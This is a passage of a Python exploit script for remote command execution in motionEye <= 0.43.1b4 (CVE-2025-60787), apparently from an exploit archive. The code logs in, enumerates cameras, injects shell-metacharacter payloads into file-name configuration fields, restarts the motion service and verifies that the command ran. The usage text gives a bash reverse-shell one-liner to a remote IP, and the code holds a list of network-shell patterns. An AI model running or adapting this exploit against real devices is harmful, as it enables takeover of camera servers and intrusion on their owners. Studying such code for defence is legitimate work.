        except RequestException as e:
            logger.warning(f"Request failed for {endpoint}: {e} (attempt {attempt + 1})")

        # Linear back-off between attempts; no sleep after the final one.
        if attempt < max_retries - 1:
            wait_time = 1 * (attempt + 1)
            logger.debug(f"Waiting {wait_time} seconds before retry...")
            time.sleep(wait_time)

    logger.error(f"All {max_retries} attempts failed for {endpoint}")
    return None
def login(self) -> bool:
    """
    Authenticate against the target and mark the instance as authenticated.

    An existing session is reused when a known session cookie is present and
    the dashboard check passes. Otherwise the page at '/' is fetched for a
    CSRF token and the credentials are posted to '/login' without following
    redirects.

    Returns:
        True once ``self.authenticated`` has been set; False on any failure.
    """
    logger.info(f"Attempting login to {self.target_url} as {self.username}")

    if self._has_valid_session():
        logger.debug("Found session cookies, verifying dashboard access...")
        if self._verify_dashboard_access():
            logger.info("Already have valid session")
            self.authenticated = True
            return True
        logger.debug("Session cookies present but cannot access dashboard")

    landing = self._make_request('GET', '/')
    if not landing:
        logger.error("Failed to fetch login page")
        return False

    self.csrf_token = self._extract_csrf_token(landing.text)
    if not self.csrf_token:
        logger.error("Could not extract CSRF token from login page")
        return False
    logger.debug(f"CSRF token extracted: {self.csrf_token[:10]}...")

    response = self._make_request(
        'POST', '/login',
        data={
            'username': self.username,
            'password': self.password,
            'csrf_token': self.csrf_token
        },
        allow_redirects=False,
        max_retries=1
    )
    if not response:
        return False

    # Decide from the POST response alone whether the login looks accepted.
    login_success = False
    status = response.status_code
    if status == 302:
        location = response.headers.get('Location', '')
        if location == '/' or 'dashboard' in location:
            login_success = True
            logger.debug("Login success via 302 redirect")
    elif status == 200:
        if self._has_valid_session():
            login_success = True
            logger.debug("Login success via session cookie")
        elif 'window.location' in response.text and ('/' in response.text or 'dashboard' in response.text):
            login_success = True
            logger.debug("Login success via JavaScript redirect")

    if not login_success:
        logger.error(f"Login failed. Status code: {response.status_code}")
        return False

    if self._verify_dashboard_access():
        logger.info("Login successful - dashboard accessible")
        self.authenticated = True
        return True

    # Dashboard check failed; a known session cookie is still accepted.
    logger.warning("Login seemed successful but dashboard not accessible")
    if self._has_valid_session():
        self.authenticated = True
        return True
    return False
def get_cameras(self, force_refresh: bool = False) -> bool:
"""
Fetch list of available cameras from the dashboard.
Args:
force_refresh: If True, clear existing camera list before fetching
"""
if force_refresh:
self.cameras.clear()
logger.debug("Cleared existing camera list")
elif self.cameras:
logger.debug(f"Using cached camera list ({len(self.cameras)} cameras)")
return True
logger.info("Fetching list of cameras")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
response = self._make_request('GET', '/')
if not response:
return False
cameras_found = set()
if BS_AVAILABLE:
try:
soup = BeautifulSoup(response.text, 'html.parser')
camera_links = soup.find_all('a', href=re.compile(r'^/camera-\d+'))
for link in camera_links:
camera_id = link.get('href').strip('/')
if camera_id and camera_id not in cameras_found:
camera_name = link.get_text().strip()
self.cameras.append({
'id': camera_id,
'name': camera_name or camera_id
})
cameras_found.add(camera_id)
camera_divs = soup.find_all('div', {'data-camera-id': True})
for div in camera_divs:
camera_id = div.get('data-camera-id')
if camera_id and camera_id not in cameras_found:
self.cameras.append({
'id': camera_id,
'name': div.get('data-camera-name', camera_id)
})
cameras_found.add(camera_id)
camera_options = soup.find_all('option', value=re.compile(r'^camera-\d+'))
for option in camera_options:
camera_id = option.get('value')
if camera_id and camera_id not in cameras_found:
self.cameras.append({
'id': camera_id,
'name': option.get_text().strip() or camera_id
})
cameras_found.add(camera_id)
except Exception as e:
logger.error(f"Error parsing cameras with BeautifulSoup: {e}")
if not self.cameras:
logger.debug("Using regex fallback for camera detection")
camera_matches = re.findall(r'/camera-(\d+)', response.text)
for camera_num in set(camera_matches):
camera_id = f"camera-{camera_num}"
self.cameras.append({
'id': camera_id,
'name': f"Camera {camera_num}"
})
if not self.cameras:
logger.warning("No cameras found, using default 'camera-1'")
self.cameras.append({'id': 'camera-1', 'name': 'Default Camera'})
logger.info(f"Found {len(self.cameras)} unique camera(s): {[c['id'] for c in self.cameras]}")
return True
def _escape_for_transport(self, command: str) -> str:
"""
Escape a command for safe transport in HTTP POST data.
This ensures the command is properly transmitted, not escaped for shell.
"""
escaped = command.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
dangerous_chars = ['`', '$', '(', ')', '|', '&', ';', '<', '>', '*', '?', '[', ']', '{', '}']
found_chars = [c for c in dangerous_chars if c in command]
if found_chars:
logger.info(f"Command contains shell metacharacters: {found_chars}")
logger.debug("These are INTENTIONAL for command injection")
return escaped
def _check_response_success(self, response: requests.Response) -> Tuple[bool, str]:
"""
Check if a response indicates successful configuration update.
Returns (success, message)
"""
if response.status_code not in [200, 201, 202, 204, 302]:
return False, f"HTTP {response.status_code}"
try:
json_data = response.json()
if isinstance(json_data, dict):
if json_data.get('status') == 'ok':
return True, "JSON status: ok"
if json_data.get('success') is True:
return True, "JSON success: true"
if json_data.get('error'):
return False, f"JSON error: {json_data['error']}"
except (json.JSONDecodeError, ValueError):
pass
response_text = response.text.lower()
error_patterns = ['error', 'fail', 'invalid', 'denied', 'forbidden']
has_error = any(pattern in response_text for pattern in error_patterns)
if has_error:
success_found = any(indicator.lower() in response_text for indicator in self.SUCCESS_INDICATORS)
if success_found:
logger.warning("Response contains both success and error indicators")
return False, "Ambiguous response (both success and error)"
else:
return False, "Error indicators found"
for indicator in self.SUCCESS_INDICATORS:
if indicator.lower() in response_text:
return True, f"Found indicator: {indicator}"
if response.status_code == 302:
location = response.headers.get('Location', '')
if 'success' in location.lower() or 'saved' in location.lower():
return True, f"Redirect to: {location}"
return False, "No success indicators found"
def inject_payload(self, camera_id: str, command: str) -> bool:
"""
Inject malicious payload into camera configuration.
safe_command = self._escape_for_transport(command)
payload_variants = [
f"$({safe_command}).%Y-%m-%d-%H-%M-%S",
f"`{safe_command}`.%Y-%m-%d-%H-%M-%S",
f";{safe_command};.%Y-%m-%d-%H-%M-%S",
f"|{safe_command}|.%Y-%m-%d-%H-%M-%S",
]
logger.info(f"Injecting payload into camera: {camera_id}")
response = self._make_request('GET', '/', timeout=10)
if response:
token = self._extract_csrf_token(response.text)
if token:
self.csrf_token = token
logger.debug("Refreshed CSRF token")
endpoints = [
f"/{camera_id}/config/set",
"/config/set",
f"/{camera_id}/edit",
"/config/update",
"/settings/camera",
]
for endpoint in endpoints:
for idx, payload in enumerate(payload_variants):
logger.debug(f"Trying endpoint: {endpoint} with payload variant {idx + 1}")
data = {
'still_images_image_file_name': payload,
'movie_file_name': payload,
'timelapse_file_name': payload,
}
if self.csrf_token:
data['csrf_token'] = self.csrf_token
headers = {}
if self.csrf_token:
headers['X-CSRFToken'] = self.csrf_token
response = self._make_request('POST', endpoint, data=data, headers=headers)
if not response:
continue
success, message = self._check_response_success(response)
if success:
logger.info(f"Payload injected successfully via {endpoint}")
logger.debug(f"Success message: {message}")
return True
logger.debug(f"Endpoint {endpoint} returned: {message}")
logger.error(f"Failed to inject payload through any endpoint for camera {camera_id}")
return False
def restart_motion(self) -> bool:
"""
Attempt to restart motion service through various endpoints.
"""
logger.info("Attempting to restart motion service")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
restart_endpoints = [
('/action/restart', 'POST', {}),
('/action/restart_motion', 'POST', {}),
('/action/restart_all', 'POST', {}),
('/config/restart', 'POST', {}),
('/restart', 'GET', {}),
('/api/restart', 'POST', {'Content-Type': 'application/json'}),
]
for endpoint, method, headers in restart_endpoints:
logger.debug(f"Trying {method} {endpoint}")
data = {}
if self.csrf_token and method == 'POST':
data['csrf_token'] = self.csrf_token
try:
if method == 'POST':
response = self._make_request('POST', endpoint, data=data, headers=headers)
else:
response = self._make_request('GET', endpoint, headers=headers)
if response:
if response.status_code in [200, 202, 204, 302]:
logger.info(f"Restart triggered via {endpoint}")
return True
else:
logger.debug(f"Endpoint {endpoint} returned {response.status_code}")
except Exception as e:
logger.debug(f"Error with {endpoint}: {e}")
continue
logger.warning("Could not trigger restart automatically")
return False
def verify_exploit(self, expected_file: str = "/tmp/pwned_verified") -> bool:
"""
Verify if the exploit was successful by checking for expected evidence.
Returns True if verification succeeded, False if failed or inconclusive.
"""
logger.info("Verifying exploit success...")
if self.last_command and 'touch' in self.last_command:
touch_match = re.search(r'touch\s+([^\s;|&]+)', self.last_command)
if touch_match:
expected_file = touch_match.group(1)
logger.info(f"Looking for created file: {expected_file}")
filename = expected_file.split('/')[-1] if '/' in expected_file else expected_file
web_paths = [
f"/motion/{filename}",
f"/static/{filename}",
f"/media/{filename}",
f"/{filename}",
]
for web_path in web_paths:
response = self._make_request('GET', web_path, timeout=10)
if response and response.status_code == 200:
logger.info(f"Found expected file at {web_path}")
return True
logger.info("=" * 60)
logger.info("MANUAL VERIFICATION REQUIRED:")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command executed: {self.last_command or 'unknown'}")
logger.info(f"Expected evidence: {expected_file}")
logger.info("\nTo verify on Docker:")
logger.info(f" docker exec motioneye ls -la {expected_file}")
logger.info("\nTo verify on system:")
logger.info(f" ls -la {expected_file}")
logger.info("\nTo verify via web (if accessible):")
logger.info(f" curl -k {self.target_url}/motion/")
logger.info("=" * 60)
return False
def run(self, command: str) -> Dict[str, bool]:
"""
Execute the full exploit chain.
Returns dictionary with status of each step.
"""
results = {
'login': False,
'cameras': False,
'injection': False,
'restart': False,
'verification': False,
'overall': False
}
self.last_command = command
logger.info("=" * 60)
logger.info("Starting motionEye RCE exploit")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command: {command}")
logger.info("=" * 60)
if not self._check_dependencies():
logger.error("Dependencies check failed")
return results
if not self.login():
logger.error("Login failed. Exiting.")
return results
results['login'] = True
if not self.get_cameras():
logger.error("Failed to get camera list")
return results
results['cameras'] = True
injection_success = False
for camera in self.cameras:
if self.inject_payload(camera['id'], command):
injection_success = True
break
if not injection_success:
logger.error("Failed to inject payload into any camera")
results['injection'] = False
return results
results['injection'] = True
if self.restart_motion():
results['restart'] = True
wait_time = 10
logger.info(f"Waiting {wait_time} seconds for command execution...")
time.sleep(wait_time)
results['verification'] = self.verify_exploit()
results['overall'] = injection_success
logger.info("=" * 60)
logger.info("Exploit execution completed")
logger.info(f"Results: {results}")
logger.info("=" * 60)
return results
def main():
"""
Main function with argument parsing.
"""
import argparse
parser = argparse.ArgumentParser(
description="MotionEye <= 0.43.1b4 RCE Exploit (CVE-2025-60787)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t http://192.168.1.100:8765 -c "touch /tmp/pwned"
%(prog)s -t https://motioneye.local -c "id > /tmp/output" -v
%(prog)s -t http://localhost:9999 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --dangerous
"""
)
parser.add_argument('-t', '--target', required=True,
help='Target URL (e.g., http://127.0.0.1:8765)')
parser.add_argument('-u', '--username', default='admin',
help='Username (default: admin)')
parser.add_argument('-p', '--password', default='',
help='Password (default: empty)')
parser.add_argument('-c', '--command',
default='touch /tmp/pwned_by_exploit',
help='Command to execute (default: touch /tmp/pwned_by_exploit)')
parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output')
parser.add_argument('--dangerous', action='store_true',
help='Acknowledge that the command may be dangerous')
parser.add_argument('--camera', help='Specific camera ID to target (default: auto-detect)')
parser.add_argument('--timeout', type=int, default=30,
help='Request timeout in seconds (default: 30)')
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
dangerous_patterns = ['bash -i', 'nc ', 'reverse', 'shell', 'exec', '/dev/tcp/']
if any(pattern in args.command.lower() for pattern in dangerous_patterns) and not args.dangerous:
logger.warning(" Command appears to be potentially dangerous!")
logger.warning("Use --dangerous flag to proceed with this command")
sys.exit(1)
exploit = MotionEyeExploit(
target_url=args.target,
username=args.username,
password=args.password,
timeout=args.timeout
)
try:
results = exploit.run(args.command)
if results['overall']:
if results['verification']:
logger.info(" Exploit fully successful - command execution verified")
sys.exit(0)
else:
logger.info(" Exploit likely successful - manual verification required")
sys.exit(2)
else:
logger.error(" Exploit failed")
sys.exit(1)
except KeyboardInterrupt:
logger.info("\nExploit interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================